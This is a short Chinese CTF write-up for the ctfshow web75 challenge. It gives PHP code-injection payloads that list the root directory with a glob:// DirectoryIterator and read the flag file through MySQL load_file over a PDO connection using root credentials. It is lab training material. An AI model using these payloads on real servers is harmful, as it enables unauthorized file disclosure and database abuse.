ctfshow web75

icun2024-01-28 19:51

开启环境:

先直接用伪协议获取 flag 位置

c=?><?php a=new DirectoryIterator("glob:///\*"); foreach(a as f) {echo(f->__toString().' ');} exit(0); ?>

c=try {dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach(dbh->query('select load_file("/flag36.txt")') as row){echo(row[0])."|"; }dbh = null;}catch (PDOException e) {echo $e->getMessage();exit(0);}exit(0);

try {

创建 PDO 实例, 连接 MySQL 数据库

$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');

在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。

foreach(dbh-\>query('select load_file("/flag36.txt")') as row) {

echo($row[0])."|";

}

$dbh = null;

}

catch (PDOException $e) {

echo $e->getMessage();exit(0);

}

exit(0);

相关推荐
千里马学框架7 分钟前
安卓15开机启动Fallbackhome去除--成果展示
android·性能优化·手机·车载·aosp·fallbackhome
Wgllss12 分钟前
大型异步下载器:基于kotlin+Compose+协程+Flow+Channel实现多文件异步同时分片断点续传下载
android·架构·android jetpack
kymjs张涛28 分钟前
前沿技术周刊 2025-06-03
android·前端·ios
_一条咸鱼_30 分钟前
Android Runtime JIT编译器核心技术原理分析(36)
android·面试·android jetpack
_一条咸鱼_35 分钟前
Android Runtime异常处理与跳转指令实现源码(35)
android·面试·android jetpack
程序员小刘41 分钟前
React Native 跨平台开发:iOS 与安卓原生模块高效交互
android·react native·react.js·ios
Nick同学42 分钟前
原生 PHP 操作数据库的方式
数据库·后端·php
Digitally1 小时前
如何将数据从 iPhone 传输到 Android?
android·ios·iphone
星--空1 小时前
Android 实现可拖动的ImageView
android
张风捷特烈2 小时前
每日一题 Flutter#10 | Dart 空安全六君子
android·flutter·面试
热门推荐
01DeepSeek各版本说明与优缺点分析02【图像处理与机器视觉】XJTU期末考点03KGG转MP3工具|非KGM文件|解密音频04零代码入门 | Coze——让大模型接入自己的数据库05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】07海康Visionmaster-常见问题排查方法-启动阶段08Coze扣子平台完整体验和实践(附国内和国际版对比)09【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!10R-tree详解